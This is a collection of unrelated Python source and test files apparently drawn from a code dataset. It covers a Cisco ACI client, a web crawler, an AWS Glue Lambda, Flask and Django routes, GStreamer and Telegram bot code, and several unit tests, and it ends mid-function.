ap_list = filter(lambda x: type(x).__name__ == 'Ap' and x.name == ap_name,
self.query_child_objects('uni/tn-%s' % tenant_name))
if len(ap_list) > 0:
epg_list = filter(lambda x: type(x).__name__ == 'AEPg' and x.name == epg_name,
self.query_child_objects(str(ap_list[0].dn)))
if len(epg_list) > 0:
return epg_list[0]
def get_faults_history(self, epg_dn):
"""
Retrieves a historic list of all faults associated to an EPG
:param epg_dn:
:return:
"""
class_query = ClassQuery('faultRecord')
class_query.propFilter = 'eq(faultRecord.affected, "' + epg_dn + '")'
return self.moDir.query(class_query)
def get_stats(self, epg_dn):
"""
Get all traffic statistics of an EPG
:param epg_dn:
:return:
"""
# Apic saves up to 95 different objects with statistic information
traffic_list = []
for i in range(10, -1, -1):
traffic = self.moDir.lookupByDn(epg_dn + '/HDl2IngrBytesAg15min-%s' % str(i))
if traffic is not None:
traffic_list.append(traffic)
return traffic_list
def get_faults(self, epg_dn):
class_query = DnQuery(epg_dn)
class_query.subtree = 'full'
class_query.subtreeInclude = 'faults'
epg_list = self.moDir.query(class_query)
fault_list = self.get_faults_from_tree(epg_list[0], [])
return fault_list
def get_faults_from_tree(self, mo, faults):
if type(mo).__name__ == 'Inst':
faults.append(mo)
for child in mo.children:
self.get_faults_from_tree(child, faults)
return faults
def get_nca_ap(self, tenant_dn):
aps = self.get_ap_by_tenant(tenant_dn)
for ap in aps:
if ap.name == AP_NAME:
return ap
def assign_any_to_any_contract(self, network_o):
contract_mo = self.create_contract(network_o.group, ANY_TO_ANY_CONTRACT_NAME)
filter_mo = self.create_filter(network_o.group,ANY_TO_ANY_FILTER_NAME)
self.create_entry(filter_mo.dn, ANY_TO_ANY_ENTRY_NAME, 'ip')
self.create_subject(filter_mo.dn, contract_mo.dn, ANY_TO_ANY_SUBJ_NAME)
self.assign_contract(network_o.epg_dn, contract_mo.dn, contract_mo.dn)
| StarcoderdataPython |
1871183 | <reponame>allenyummy/GoodInfo<filename>src/entry_goodinfo.py
# encoding=utf-8
# Author: <NAME>
# Description: Example code
import argparse
import logging
import os
import sys
from tqdm import tqdm
from src.utils.struct import GoodInfoStruct
from src.utils.utility import readJson, writeJson
from src.crawler.goodinfo.goodinfo import get_code_name, get_basic
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
datefmt="%Y-%m-%d %H:%M",
)
logger = logging.getLogger(__name__)
def parse_args():
parser = argparse.ArgumentParser(description="Web Crawler for Good Info.")
parser.add_argument(
"-o",
"--output_file",
type=str,
help="output file to store the results",
)
parser.add_argument(
"-c",
"--cache_file",
type=str,
help="read cache file to accelerate the program",
)
args = parser.parse_args()
return args
def main():
"""Args"""
args = parse_args()
logger.info(f"ARGS: {args}\n")
""" Get basic from cache """
cache = None
if args.cache_file:
cache = readJson(infile=args.cache_file)
cache = [GoodInfoStruct(**c) for c in cache]
else:
cache = get_code_name()
""" Get basic from goodinfo website """
data = list()
for i, c in enumerate(
tqdm(
cache,
total=(len(cache)),
desc="Get Basic Info",
)
):
try:
if c.公司名稱:
goodinfo = c
else:
goodinfo = get_basic(c.股票代號)
except Exception as e:
logger.error(f"{c.股票代號}, {e}")
""" Write data """
if args.output_file:
os.makedirs(os.path.dirname(args.output_file), exist_ok=True)
writeJson(
data=[d.__2dict__() for d in data]
+ [c.__2dict__() for c in cache[i:]],
outfile=args.output_file,
)
sys.exit()
else:
data.append(goodinfo)
if i > 0 and i % 50 == 0:
logger.info(f"write file to {i}")
""" Write data """
if args.output_file:
os.makedirs(os.path.dirname(args.output_file), exist_ok=True)
writeJson(
data=[d.__2dict__() for d in data]
+ [c.__2dict__() for c in cache[i + 1 :]],
outfile=args.output_file,
)
""" Write data """
if args.output_file:
os.makedirs(os.path.dirname(args.output_file), exist_ok=True)
writeJson(
data=[d.__2dict__() for d in data],
outfile=args.output_file,
)
if __name__ == "__main__":
main()
| StarcoderdataPython |
12802863 | import boto3
GLUE = boto3.client('glue')
def lambda_handler(event, context):
crawler_name = event["crawler_name"]
crawler_info = GLUE.get_crawler(Name=crawler_name)
current_state = crawler_info['Crawler']['State']
if current_state == 'READY':
GLUE.start_crawler(Name=crawler_name)
print("Crawler [{}] started".format(crawler_name))
else:
print("Crawler [{}] currently in state [{}], could not trigger a new run.".format(crawler_name, current_state))
return {**event}
| StarcoderdataPython |
8135070 | import unittest
from core.workflow_manager import WorkflowManager
from uuid import uuid4
class TestDialog:
def __init__(self, id):
self.id = id
class TestService:
def __init__(self, name):
self.name = name
class TestWorkflowManagerDialog(unittest.TestCase):
def setUp(self):
self.workflow = WorkflowManager()
self.dialog_id = uuid4().hex
self.workflow.add_workflow_record(TestDialog(self.dialog_id))
def test_internal_params(self):
self.assertTrue(self.dialog_id in self.workflow.workflow_records)
self.assertEqual(1, len(self.workflow.workflow_records))
def test_get_record(self):
self.assertEqual(self.workflow.get_dialog_by_id(self.dialog_id).id, self.dialog_id, "get_dialog works wrong")
def test_add_another_dialog(self):
another_dialog_id = uuid4().hex
self.workflow.add_workflow_record(TestDialog(another_dialog_id))
self.assertTrue(self.dialog_id in self.workflow.workflow_records)
self.assertTrue(another_dialog_id in self.workflow.workflow_records)
self.assertEqual(2, len(self.workflow.workflow_records))
def test_add_duplicate_dialog(self):
with self.assertRaises(ValueError):
self.workflow.add_workflow_record(TestDialog(self.dialog_id))
def test_flush_record(self):
workflow_record = self.workflow.flush_record(self.dialog_id)
self.assertTrue(isinstance(workflow_record, dict))
self.assertEqual(workflow_record["dialog"].id, self.dialog_id)
def test_add_task(self):
payload = uuid4().hex
task_service = TestService("testservice")
task_id = self.workflow.add_task(self.dialog_id, task_service, payload, 1)
self.assertTrue(task_id is not None)
self.assertEqual(1, len(self.workflow.tasks))
self.assertTrue(task_id in self.workflow.tasks)
def test_complete_task(self):
payload = uuid4().hex
response = "123"
task_service = TestService("testservice")
task_id = self.workflow.add_task(self.dialog_id, task_service, payload, 1)
workflow_record, task = self.workflow.complete_task(task_id, response)
self.assertTrue(isinstance(task, dict))
self.assertTrue(isinstance(workflow_record, dict))
self.assertEqual(task["service"].name, task_service.name)
self.assertEqual(task["dialog"], workflow_record["dialog"].id)
def test_double_complete_task(self):
payload = uuid4().hex
response = "123"
task_service = TestService("testservice")
task_id = self.workflow.add_task(self.dialog_id, task_service, payload, 1)
self.workflow.complete_task(task_id, response)
workflow_record, task = self.workflow.complete_task(task_id, response)
self.assertTrue(workflow_record is None)
self.assertTrue(task is None)
def test_next_tasks(self):
payload = uuid4().hex
response = "123"
done_service = TestService(uuid4().hex)
waiting_service = TestService(uuid4().hex)
skipped_service = TestService(uuid4().hex)
self.workflow.skip_service(self.dialog_id, skipped_service)
task_id = self.workflow.add_task(self.dialog_id, done_service, payload, 1)
self.workflow.complete_task(task_id, response)
self.workflow.add_task(self.dialog_id, waiting_service, payload, 1)
done, waiting, skipped = self.workflow.get_services_status(self.dialog_id)
self.assertTrue(done_service.name in done)
self.assertTrue(waiting_service.name in waiting)
self.assertTrue(skipped_service.name in skipped)
def test_flush(self):
payload = uuid4().hex
response = "123"
done_service = TestService(uuid4().hex)
waiting_service = TestService(uuid4().hex)
skipped_service = TestService(uuid4().hex)
self.workflow.skip_service(self.dialog_id, skipped_service)
done_task_id = self.workflow.add_task(self.dialog_id, done_service, payload, 1)
self.workflow.complete_task(done_task_id, response)
waiting_task_id = self.workflow.add_task(self.dialog_id, waiting_service, payload, 1)
workflow_record = self.workflow.flush_record(self.dialog_id)
self.assertEqual(self.dialog_id, workflow_record["dialog"].id)
workflow_record, late_task = self.workflow.complete_task(waiting_task_id, response)
self.assertEqual(self.dialog_id, workflow_record["dialog"].id)
self.assertTrue("dialog" in late_task)
self.assertEqual(self.dialog_id, late_task["dialog"])
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3303628 | from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('admin/', admin.site.urls),
path('api/', include(('priceapi.urls', 'priceapi'), namespace='priceapi')),
]
| StarcoderdataPython |
321702 | from flask import Flask, jsonify
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
from sqlalchemy import create_engine, func
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
Measurement = Base.classes.measurement
Station = Base.classes.station
app=Flask(__name__)
@app.route("/")
def home():
return( "Welcome to my Climate Analysis API!<br/>"
f"Available Routes:<br/>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/>"
f"/api/v1.0/<start-date><br/>"
f"/api/v1.0/<start-date>/<end-date><br/>")
@app.route("/api/v1.0/precipitation")
def precipitation():
session = Session(engine)
precips = session.query(Measurement.date, Measurement.prcp)\
.filter((Measurement.date > '2016-08-22') & (Measurement.prcp != 'None')).all()
session.close()
precipitation = []
for date, prcp in precips:
precip_dict={}
precip_dict['date'] = date
precip_dict['prcp'] = prcp
precipitation.append(precip_dict)
return jsonify(precipitation)
@app.route("/api/v1.0/stations")
def stations():
session = Session(engine)
st=session.query(Station).all()
stations=[]
for station in st:
stations.append(station.station)
session.close()
return jsonify(stations)
@app.route("/api/v1.0/tobs")
def tobs():
session = Session(engine)
last_year = session.query(Measurement.station, Measurement.date, Measurement.tobs)\
.filter(Measurement.station == 'USC00519281').filter(Measurement.date > '2016-08-22').all()
session.close()
year_temp = []
for tobs in last_year:
year_temp.append(tobs)
return jsonify(year_temp)
@app.route("/api/v1.0/<start>/<end>")
def start_end(start, end):
session = Session(engine)
calc = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs),
func.max(Measurement.tobs)).filter(Measurement.date >= start).\
filter(Measurement.date <= end).all()
session.close()
return jsonify(calc)
@app.route("/api/v1.0/<start>")
def start(start):
session = Session(engine)
calc = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs),
func.max(Measurement.tobs)).filter(Measurement.date >= start).all()
session.close()
return jsonify(calc)
if __name__ == "__main__":
app.run(debug=False) | StarcoderdataPython |
6459192 | import logging
from cryptoadvance.specter.cli import server
from click.testing import CliRunner
import sys
import traceback
import mock
from mock import patch, MagicMock, call
mock_config_dict = {
"PORT": "123",
"DEBUG": "WURSTBROT",
"SPECTER_SSL_CERT_SUBJECT_C": "AT",
"SPECTER_SSL_CERT_SUBJECT_ST": "Blub",
"SPECTER_SSL_CERT_SUBJECT_L": "Blub",
"SPECTER_SSL_CERT_SUBJECT_O": "Blub",
"SPECTER_SSL_CERT_SUBJECT_OU": "Blub",
"SPECTER_SSL_CERT_SUBJECT_CN": "Blub",
"SPECTER_SSL_CERT_SERIAL_NUMBER": 123,
# We don't want to make a more sophisticated mock, so we simply set here
# the same value we set via CMD-Line
"CERT": "bla",
"KEY": "blub",
}
@patch("cryptoadvance.specter.cli.cli_server.create_app")
@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_host_and_port(init_app, create_app, caplog):
caplog.set_level(logging.DEBUG)
mock_app = MagicMock()
mock_app.config = MagicMock()
d = mock_config_dict
mock_app.config.__getitem__.side_effect = d.__getitem__
create_app.return_value = mock_app
runner = CliRunner()
result = runner.invoke(server, ["--port", "456", "--host", "0.0.0.1"])
print(result.output)
if result.exception != None:
# Makes searching for issues much more convenient
traceback.print_tb(result.exception.__traceback__)
print(result.exception, file=sys.stderr)
print(mock_app.config.mock_calls)
assert result.exit_code == 0
mock_app.config.__setitem__.assert_called_with("PORT", 456)
mock_app.run.assert_called_with(
debug="WURSTBROT", host="0.0.0.1", port="123", extra_files=["templates"]
)
@patch("cryptoadvance.specter.cli.cli_server.create_app")
@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_host_and_port(init_app, create_app, caplog):
caplog.set_level(logging.DEBUG)
mock_app = MagicMock()
mock_app.config = MagicMock()
d = mock_config_dict
mock_app.config.__getitem__.side_effect = d.__getitem__
create_app.return_value = mock_app
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(server, ["--cert", "bla", "--key", "blub"])
print(result.output)
if result.exception != None:
# Makes searching for issues much more convenient
traceback.print_tb(result.exception.__traceback__)
print(result.exception, file=sys.stderr)
assert result.exit_code == 0
print(mock_app.config.mock_calls)
mock_app.config.__setitem__.call_count = 2
mock_app.config.__setitem__.assert_called_with("KEY", "blub")
mock_app.config.__setitem__.assert_any_call("CERT", "bla")
# This doesn't work as the tmp-directory is always different
# mock_app.run.assert_called_with(debug='WURSTBROT', host='0.0.0.1', port='123', extra_files=['templates'],ssl_context=('/tmp/tmpb_2552yg/bla', '/tmp/tmpb_2552yg/blub')))
# So let's check differently:
print(mock_app.run.call_args.kwargs)
# results in something like:
# {'debug': 'WURSTBROT', 'host': '127.0.0.1', 'port': '123', 'extra_files': ['templates'], 'ssl_context': ('/tmp/tmpnzivft_y/bla', '/tmp/tmpnzivft_y/blub')}
assert mock_app.run.call_args.kwargs["ssl_context"][0].endswith("bla")
assert mock_app.run.call_args.kwargs["ssl_context"][1].endswith("blub")
@patch("cryptoadvance.specter.cli.cli_server.create_app")
@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_debug(init_app, create_app, caplog):
caplog.set_level(logging.DEBUG)
runner = CliRunner()
result = runner.invoke(server, ["--debug"])
print(result.output)
if result.exception != None:
# Makes searching for issues much more convenient
traceback.print_tb(result.exception.__traceback__)
print(result.exception)
assert result.exit_code == 0
assert "We're now on level DEBUG on logger cryptoadvance" in caplog.text
@patch("cryptoadvance.specter.cli.cli_server.create_app")
@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_datafolder(init_app, create_app, caplog):
caplog.set_level(logging.DEBUG)
mock_app = MagicMock()
mock_app.config = MagicMock()
d = mock_config_dict
mock_app.config.__getitem__.side_effect = d.__getitem__
create_app.return_value = mock_app
runner = CliRunner()
result = runner.invoke(server, ["--specter-data-folder", "~/.specter-some-folder"])
print(result.output)
if result.exception != None:
# Makes searching for issues much more convenient
traceback.print_tb(result.exception.__traceback__)
print(result.exception, file=sys.stderr)
print(mock_app.config.mock_calls)
assert result.exit_code == 0
mock_app.config.__setitem__.assert_called_once_with(
"SPECTER_DATA_FOLDER", "~/.specter-some-folder"
)
@patch("cryptoadvance.specter.cli.cli_server.create_app")
@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_config(init_app, create_app, caplog):
caplog.set_level(logging.DEBUG)
mock_app = MagicMock()
mock_app.config = MagicMock()
d = {
"PORT": "123",
"DEBUG": "WURSTBROT",
"SPECTER_SSL_CERT_SUBJECT_C": "AT",
"SPECTER_SSL_CERT_SUBJECT_ST": "Blub",
"SPECTER_SSL_CERT_SUBJECT_L": "Blub",
"SPECTER_SSL_CERT_SUBJECT_O": "Blub",
"SPECTER_SSL_CERT_SUBJECT_OU": "Blub",
"SPECTER_SSL_CERT_SUBJECT_CN": "Blub",
"SPECTER_SSL_CERT_SERIAL_NUMBER": 123,
# We don't want to make a more sophisticated mock, so we simply set here
# the same value we set via CMD-Line
"CERT": "bla",
"KEY": "blub",
}
mock_app.config.__getitem__.side_effect = d.__getitem__
create_app.return_value = mock_app
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(server, ["--config", "MuhConfig"])
print(result.output)
if result.exception != None:
# Makes searching for issues much more convenient
traceback.print_tb(result.exception.__traceback__)
print(result.exception, file=sys.stderr)
assert result.exit_code == 0
print(mock_app.config.mock_calls)
create_app.assert_called_once_with(config="cryptoadvance.specter.config.MuhConfig")
| StarcoderdataPython |
6492788 | <gh_stars>0
'''Basic simulation unittest'''
import tests
import model.user
from unittest import TestCase
class TestSubmit(TestCase):
@tests.async_test
async def test_submit(self):
await model.user.create('admin', '<PASSWORD>', 'Admin',
level=model.user.UserLevel.kernel)
response = await tests.request('/user/login', {
'mail': 'admin',
'password': '<PASSWORD>'
})
self.assertEqual(response, 'Success')
response = await tests.request('/problem/update', {})
self.assertEqual(response, 'Success')
| StarcoderdataPython |
5068718 | <gh_stars>1-10
# Based on https://github.com/google-coral/project-bodypix/blob/master/gstreamer.py
from functools import partial
import sys
import time
import numpy as np
import gi
gi.require_version("Gst", "1.0")
gi.require_version("GstBase", "1.0")
from gi.repository import GLib, GObject, Gst, GstBase
GObject.threads_init()
Gst.init(None)
def on_bus_message(bus, message, loop):
t = message.type
if t == Gst.MessageType.EOS:
loop.quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write("Warning: %s: %s\n" % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write("Error: %s: %s\n" % (err, debug))
loop.quit()
return True
def run_pipeline(pipelineStr):
print("Launch string:", pipelineStr)
pipeline = Gst.parse_launch(pipelineStr)
pipeline.set_state(Gst.State.PLAYING)
state_change_info = pipeline.get_state(Gst.CLOCK_TIME_NONE)
print(
f"Image src pipeline state change to running successful? : {state_change_info[0] == Gst.StateChangeReturn.SUCCESS}"
)
loop = GObject.MainLoop()
bus = pipeline.get_bus()
bus.add_signal_watch()
bus.connect("message", on_bus_message, loop)
try:
loop.run()
except:
pass
pipeline.set_state(Gst.State.NULL)
pipeline.set_state(Gst.State.PAUSED)
pipeline.set_state(Gst.State.PLAYING)
try:
loop.run()
except:
pass
pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
if __name__ == "__main__":
run_pipeline(
"pyspinsrc num-buffers=10 exposure=10000 ! video/x-raw, framerate=10/1, width=480 ! videoconvert ! xvimagesink"
)
run_pipeline(
"pyspinsrc num-buffers=10 exposure=20000 ! video/x-raw, framerate=15/1, height=480 ! videoconvert ! xvimagesink"
)
| StarcoderdataPython |
3538630 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for API Context."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import httplib
import mock
import requests
from absl.testing import absltest
from upvote.gae.modules.bit9_api.api import context
from upvote.gae.modules.bit9_api.api import exceptions as excs
from upvote.gae.modules.bit9_api.api import test_utils
@mock.patch.object(
requests, 'request', return_value=test_utils.GetTestResponse())
class ContextTest(absltest.TestCase):
def testBadVersion(self, _):
with self.assertRaises(ValueError):
context.Context('foo.corn', 'foo', 1, version='v2')
def testBadTimeout(self, _):
with self.assertRaises(ValueError):
context.Context('foo.corn', 'foo', -1, version='v2')
with self.assertRaises(ValueError):
context.Context('foo.corn', 'foo', 'foo', version='v2')
def testNoSchema(self, mock_req):
ctx = context.Context('foo.corn', 'foo', 1)
ctx.ExecuteRequest('GET', api_route='abc')
mock_req.assert_called_once_with(
'GET', 'https://foo.corn/api/bit9platform/v1/abc', headers=mock.ANY,
json=None, verify=mock.ANY, timeout=mock.ANY)
def testHeaders(self, mock_req):
ctx = context.Context('foo.corn', 'foo', 1)
ctx.ExecuteRequest('GET')
expected_headers = {
'X-Auth-Token': 'foo',
'Content-Type': 'application/json'}
mock_req.assert_called_once_with(
'GET', mock.ANY, headers=expected_headers, json=None, verify=True,
timeout=1)
def testWithPath(self, mock_req):
ctx = context.Context('foo.corn/other/path', 'foo', 1)
ctx.ExecuteRequest('GET', api_route='abc')
mock_req.assert_called_once_with(
'GET', 'https://foo.corn/other/path/api/bit9platform/v1/abc',
headers=mock.ANY, json=None, verify=mock.ANY, timeout=mock.ANY)
def testNoRoute(self, mock_req):
ctx = context.Context('foo.corn', 'foo', 1)
ctx.ExecuteRequest('GET')
mock_req.assert_called_once_with(
'GET', 'https://foo.corn/api/bit9platform/v1', headers=mock.ANY,
json=None, verify=mock.ANY, timeout=mock.ANY)
def testRequestError(self, mock_req):
mock_req.side_effect = requests.RequestException
ctx = context.Context('foo.corn', 'foo', 1)
with self.assertRaises(excs.RequestError):
ctx.ExecuteRequest('GET')
def testClientError(self, mock_req):
mock_req.return_value = test_utils.GetTestResponse(
status_code=httplib.BAD_REQUEST)
ctx = context.Context('foo.corn', 'foo', 1)
with self.assertRaises(excs.RequestError):
ctx.ExecuteRequest('GET')
def testServerError(self, mock_req):
mock_req.return_value = test_utils.GetTestResponse(
status_code=httplib.INTERNAL_SERVER_ERROR)
ctx = context.Context('foo.corn', 'foo', 1)
with self.assertRaises(excs.RequestError):
ctx.ExecuteRequest('GET')
def testNotFound(self, mock_req):
mock_req.return_value = test_utils.GetTestResponse(
status_code=httplib.NOT_FOUND)
ctx = context.Context('foo.corn', 'foo', 1)
with self.assertRaises(excs.NotFoundError):
ctx.ExecuteRequest('GET')
def testEmptyResponse(self, mock_req):
mock_req.return_value = test_utils.GetTestResponse(status_code=httplib.OK)
mock_req.return_value.text = None
ctx = context.Context('foo.corn', 'foo', 1)
with self.assertRaises(excs.RequestError):
ctx.ExecuteRequest('GET')
def testFailedJsonParse(self, mock_req):
mock_req.return_value = test_utils.GetTestResponse()
mock_req.return_value.text = '{"Invalid": "JSON}'
ctx = context.Context('foo.corn', 'foo', 1)
with self.assertRaises(excs.RequestError):
ctx.ExecuteRequest('GET')
if __name__ == '__main__':
absltest.main()
| StarcoderdataPython |
6415147 | import os
os.system("sudo service redis-server start")
from telethon import TelegramClient, events, Button, extensions, functions, types
from os.path import dirname, realpath, join
import re
import asyncio
import datetime
from utilities import utilities
import json
loop = asyncio.get_event_loop()
utilities.client = None
def sort_key(p):
return p["name"]
def run_client():
utilities.config = utilities.get_config()
config = utilities.config
utilities.client = TelegramClient(
"sessions_bot", config["api_id"], config["api_hash"], loop=loop
)
utilities.client.start()
utilities.load_plugins()
utilities.plugins.sort(key=sort_key)
utilities.public_plugins.sort(key=sort_key)
run_client()
from Db.mute_sql import getMutedUser, remMuteUser
from Db.dev_sql import getDevsUsers
for dev in getDevsUsers():
utilities.devs.append(int("%.0f" % dev.user_id))
async def saveBotId():
me = await utilities.client.get_me()
utilities.prLightGray("name : " + me.first_name)
if me.username:
utilities.prYellow("username : https://t.me/" + me.username)
if me.bot:
utilities.prGreen("botType : API")
else:
utilities.prGreen("botType : CLI")
utilities.prBlack("---------------------------")
utilities.config["bot_id"] = (me).id
utilities.config["isbot"] = (me).bot
utilities.save_config()
@utilities.client.on(events.ChatAction)
async def my_event_handler(event):
try:
if event.user_joined or event.user_added:
from_user = event.added_by
target_user = event.user
plugins = utilities.plugins
for plugin in plugins:
if "added" not in plugin:
continue
if "bot" in plugin and utilities.config["isbot"] != plugin["bot"]:
if plugin["bot"]:
await event.reply("for bot-api only")
else:
await event.reply("for bot-cli only")
return
# if plugin["sudo"]:
# if check_sudo(event.sender_id):
# return_values = await plugin["added"](
# event,
# event.chat_id,
# 0
# if (target_user.id in utilities.user_steps)
# else utilities.user_steps[target_user.id]["step"],
# crons=utilities.crons,
# )
# for return_value in return_values:
# if return_value:
# await (return_value)
# else:
# await event.reply("for sudores")
# else:
return_values = await plugin["added"](
event,
event.chat_id,
0
if (target_user.id not in utilities.user_steps)
else utilities.user_steps[target_user.id]["step"],
)
if return_values:
for return_value in return_values:
await (return_value)
except Exception as e:
print("chat_handler : %s" % (e))
@utilities.client.on(events.NewMessage)
async def command_interface(event):
try:
message = event.message
prefix = "send"
if message.is_reply:
prefix = "reply"
if message.out:
return
from_id = message.from_id
to_id = message.chat_id
if event.is_private:
pr = utilities.prGreen
else:
pr = utilities.prPurple
if message.raw_text and not message.via_bot_id:
stri = (
str(from_id)
+ ": "
+ prefix
+ " text message : "
+ message.raw_text
+ " to "
+ str(to_id)
)
pr(stri)
elif message.media and not message.via_bot_id:
pr(str(from_id) + ": " + prefix + " media message to " + str(to_id))
elif message.via_bot_id:
pr(str(from_id) + ": " + prefix + " inline message to " + str(to_id))
else:
utilities.prRed(
str(from_id) + ": " + prefix + " unknown message to " + str(to_id)
)
except Exception as e:
print(str(e))
@utilities.client.on(events.MessageEdited)
@utilities.client.on(events.NewMessage)
async def my_event_handler(event):
try:
message = event.message
chat_id = event.chat_id
from_id = event.sender_id
plugins = utilities.plugins
mutedUsers = getMutedUser(chat_id, from_id)
if mutedUsers:
remMuteUser(chat_id, from_id)
if message.raw_text:
matches = re.findall("^[#/!](cancel)$", event.raw_text, re.IGNORECASE)
if len(matches) > 0 and matches[0] == "cancel":
if from_id in utilities.user_steps:
del utilities.user_steps[from_id]
return await message.reply("Canceling successfully !")
if from_id in utilities.user_steps:
for plugin in plugins:
if plugin["name"] == utilities.user_steps[from_id]["name"]:
for pattern in plugin["patterns"]:
if re.search(
pattern, event.raw_text, re.IGNORECASE | re.MULTILINE
):
matches = re.findall(
pattern, event.raw_text, re.IGNORECASE | re.DOTALL
)
break
else:
matches = ["xxxxxxxxxx"]
if plugin["sudo"]:
if utilities.check_sudo(from_id):
return_values = await plugin["run"](
message,
matches[0],
chat_id,
utilities.user_steps[from_id]["step"],
)
for return_value in return_values:
if return_value:
try:
await (return_value)
except Exception as e:
print("step :" + str(e))
else:
return
else:
return_values = await plugin["run"](
message,
matches[0],
chat_id,
utilities.user_steps[from_id]["step"],
)
if return_values:
for return_value in return_values:
await (return_value)
break
return
elif message.raw_text is not None and message.raw_text != "":
if "flood" not in utilities.config:
utilities.config["flood"] = True
utilities.save_config()
if utilities.config["flood"]:
pv = utilities.red.get("flood-" + str(message.sender_id)) or 0
# print("flood-" + str(message.sender_id), pv)
if pv == 0:
utilities.flood[message.sender_id] = True
utilities.red.set(
"flood-" + str(message.sender_id), (int(pv) + 1), ex=1
)
if (int(pv) + 1) == 5 and utilities.flood[message.sender_id]:
await message.reply("please do not flood...")
utilities.prRed(
str(message.sender_id) + " : is causing flood please stop..."
)
utilities.flood[message.sender_id] = False
return
elif (int(pv) + 1) >= 5:
return
for plugin in plugins:
for pattern in plugin["patterns"]:
if re.search(pattern, event.raw_text, re.IGNORECASE | re.MULTILINE):
if (
"bot" in plugin
and utilities.config["isbot"] != plugin["bot"]
):
if plugin["bot"]:
await event.reply("for bot-api only")
else:
await event.reply("for bot-cli only")
return
matches = re.findall(
pattern,
event.raw_text,
re.IGNORECASE | re.MULTILINE | re.DOTALL,
)
if plugin["sudo"]:
if utilities.check_sudo(event.sender_id):
return_values = await plugin["run"](
event, matches[0], chat_id, 0, crons=utilities.crons
)
for return_value in return_values:
if return_value:
try:
await (return_value)
except Exception as e:
print("text main :" + str(e))
else:
continue
else:
return_values = await plugin["run"](
event, matches[0], chat_id, 0, crons=utilities.crons
)
if return_values:
for return_value in return_values:
await (return_value)
elif message.media is not None or message.file is not None:
match = ""
if message.photo:
match = "__photo__"
if message.gif:
match = "__gif__"
for plugin in plugins:
for pattern in plugin["patterns"]:
if re.search(pattern, match, re.IGNORECASE | re.MULTILINE):
matches = re.findall(pattern, match, re.IGNORECASE)
if plugin["sudo"]:
if utilities.check_sudo(event.sender_id):
return_values = await plugin["run"](
event, matches[0], chat_id, 0
)
for return_value in return_values:
try:
await (return_value)
except Exception as e:
print("media :" + str(e))
else:
return
else:
return_values = await plugin["run"](
event, matches[0], chat_id, 0
)
if return_values:
for return_value in return_values:
await (return_value)
except Exception as e:
print(str(e))
await event.reply("Error : " + str(e))
@utilities.client.on(events.InlineQuery)
async def my_event_handler(event):
builder = event.builder
try:
plugins = utilities.plugins
for plugin in plugins:
if "inlineQuery" not in plugin:
continue
for pattern in plugin["inlineData"]:
if re.search(pattern, str(event.text), re.IGNORECASE | re.MULTILINE):
matches = re.findall(
pattern,
str(event.text),
re.IGNORECASE | re.MULTILINE | re.DOTALL,
)
if plugin["sudo"]:
if utilities.check_sudo(event.sender_id):
return_values = await plugin["inlineQuery"](
event,
matches[0],
event.chat_id,
0
if (event.sender_id not in utilities.user_steps)
else utilities.user_steps[event.sender_id]["step"],
crons=utilities.crons,
)
for return_value in return_values:
if return_value:
try:
await (return_value)
except Exception as e:
print("inline :" + str(e))
else:
await event.answer(
[
builder.article(
"for sudors only", text="for sudors only"
)
]
)
else:
return_values = await plugin["inlineQuery"](
event,
matches[0],
event.chat_id,
0
if (event.sender_id not in utilities.user_steps)
else utilities.user_steps[event.sender_id]["step"],
)
if return_values:
for return_value in return_values:
await (return_value)
except Exception as e:
print(str(e))
@utilities.client.on(events.CallbackQuery)
async def handler(event):
try:
plugins = utilities.plugins
for plugin in plugins:
if "callbackQuery" not in plugin:
continue
for pattern in plugin["callbackData"]:
if re.search(
pattern, str(event.data.decode()), re.IGNORECASE | re.MULTILINE
):
matches = re.findall(
pattern,
str(event.data.decode()),
re.IGNORECASE | re.MULTILINE | re.DOTALL,
)
if plugin["sudo"]:
if utilities.check_sudo(event.sender_id):
return_values = await plugin["callbackQuery"](
event,
matches[0],
event.chat_id,
0
if (event.sender_id not in utilities.user_steps)
else utilities.user_steps[event.sender_id]["step"],
crons=utilities.crons,
)
for return_value in return_values:
if return_value:
try:
await (return_value)
except Exception as e:
print("callback :" + str(e))
else:
await event.answer("Sudors only!")
else:
return_values = await plugin["callbackQuery"](
event,
matches[0],
event.chat_id,
0
if (event.sender_id not in utilities.user_steps)
else utilities.user_steps[event.sender_id]["step"],
)
if return_values:
for return_value in return_values:
await (return_value)
except Exception as e:
print(str(e))
async def clock():
while True:
for _data in utilities.red.lrange("crons", 0, -1):
data = json.loads(_data)
if datetime.datetime.fromisoformat(data["time"]) < datetime.datetime.now():
for plugin in utilities.plugins:
if "cron" in plugin and plugin["name"] == data["name"]:
return_values = await plugin["cron"](data)
for return_value in return_values:
if return_value:
try:
await (return_value)
except Exception as e:
print("clock :" + str(e))
utilities.red.lrem("crons", 0, _data)
if len(utilities.crons) != 0:
for data in utilities.crons:
if data["time"] < datetime.datetime.now():
